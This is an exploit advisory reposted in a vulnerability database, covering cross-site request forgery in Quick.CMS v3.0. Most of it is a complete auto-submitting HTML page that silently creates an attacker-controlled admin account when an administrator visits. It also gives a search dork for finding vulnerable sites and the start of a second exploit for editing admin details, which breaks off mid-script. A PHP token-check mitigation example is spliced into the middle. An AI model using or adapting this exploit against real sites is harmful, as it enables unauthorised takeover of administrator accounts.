Quick.CMS v3.0 CSRF flaws and fixes

2011-04-27T00:00:00
ID MYHACK58:62201130217
Type myhack58
Reporter Anonymous
Modified 2011-04-27T00:00:00

Description

(+) Exploit Title: Quick CMS v3.0 Cross Site Request Forgery (Add Admin User)

(+) Author : ^Xecuti0n3r

(+) E-mail : xecuti0n3r()yahoo.com

(+) Category : Web Apps [XSRF]

(+) Dork : intext:"Quick. Cms v3. 0" inurl:admin.php

(+) Demo CMS Link: http://opensolution.org/Quick.Cms

I'm ^Xecuti0n3r member from Inj3ct0r Team

All you have to do is save the code below as exploit.html and host it on a website.

If a person with admin permissions visits the site, the attacker is automatically added as Admin without warning ;)



Code:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>

<title>Quick CMS v3.0 Cross Site Request Forgery (Add Admin User)</title>

</head>

<body onload="javascript:fireForms()">

<script language="JavaScript">

function fireForms()

{

var count = 2;

var i=0;

for(i=0; i<count; i++)

{

document.forms[i].submit();

}

}

</script>

<H2>Quick CMS v3.0 Cross Site Request Forgery (Add Admin User)</H2>

<form method="POST" name="form0" action="http://www.7747.net/admin.php?p=users-form&iUser=">

<input type="hidden" name="iUser" value=""/>

<input type="hidden" name="sLoginOld" value=""/>

<input type="hidden" name="sOptionList" value="save and go to the list "/>

<input type="hidden" name="sLogin" value="admin3"/>

<input type="hidden" name="sPass" value="admin2"/>

<input type="hidden" name="sFirstName" value="Admin2"/>

<input type="hidden" name="sLastName" value="Admin2"/>

<input type="hidden" name="sCompanyName" value="ZZZZZ"/>

<input type="hidden" name="sStreet" value="ZZZZZZZZ"/>

<input type="hidden" name="sZipCode" value="9 9 9 9 9"/>

<input type="hidden" name="sCity" value="ZZZZZZ"/>

<input type="hidden" name="sPhone" value="9 9 9 9 9 9 9 9 9 3"/>

<input type="hidden" name="sEmail" value="attacker@jojo.com"/>

</form>

</form>

</body>

</html>
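
The forged POST above contains only fixed values, so a third-party page can build it in full. The following is an added example, not Quick.Cms code and not part of the advisory: a per-session token check that an application could run before handling a state-changing POST such as admin.php?p=users-form. The function names, the sCsrfToken field, the cms.example origin and PHP 7 or later (for random_bytes) are assumptions.

```php
<?php
// Added example: synchronizer-token check for state-changing admin requests.
// Function names and the sCsrfToken field are hypothetical, not Quick.Cms code.

// Create (once per session) and return the token to embed in each admin form.
function csrfToken(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Hidden field to print inside the users-form <form>.
function csrfField(array &$session): string
{
    return '<input type="hidden" name="sCsrfToken" value="' . csrfToken($session) . '"/>';
}

// True only when the POST carries the session's token and, if the browser
// sent an Origin header, that header names this site.
function csrfRequestAllowed(array $session, array $post, array $server, string $siteOrigin): bool
{
    if (isset($server['HTTP_ORIGIN']) && $server['HTTP_ORIGIN'] !== $siteOrigin) {
        return false;
    }
    $sent = $post['sCsrfToken'] ?? '';
    $expected = $session['csrf'] ?? '';
    return is_string($sent) && is_string($expected) && $expected !== '' && hash_equals($expected, $sent);
}

// Constructed demo data; in the application pass $_SESSION, $_POST, $_SERVER.
$session = [];
$token = csrfToken($session);
$site = 'https://cms.example';

// Forged request shaped like the auto-submitted form: no token, foreign Origin.
$forged = ['sLogin' => 'admin3', 'sPass' => 'admin2'];
var_dump(csrfRequestAllowed($session, $forged, ['HTTP_ORIGIN' => 'https://attacker.example'], $site));

// Legitimate request from the admin panel's own form.
$legit = $forged + ['sCsrfToken' => $token];
var_dump(csrfRequestAllowed($session, $legit, ['HTTP_ORIGIN' => $site], $site));
```

The same check covers the edit-user form below, since both requests go through the same POST handler path and neither carries a secret value.
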

EDIT USER:

All you have to do is save the code below as exploit.html and host it on a website.

If a person with admin permissions visits the site, the attacker is automatically added as Admin without warning ;)



Code:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>

<title>Quick CMS v3.0 Cross Site Request Forgery (Edit Existing Admin details)</title>

</head>

<body onload="javascript:fireForms()">

<script language="JavaScript">

function fireForms()

{

var count = 2;

var i=0;

for(i=0; i<count; i++)
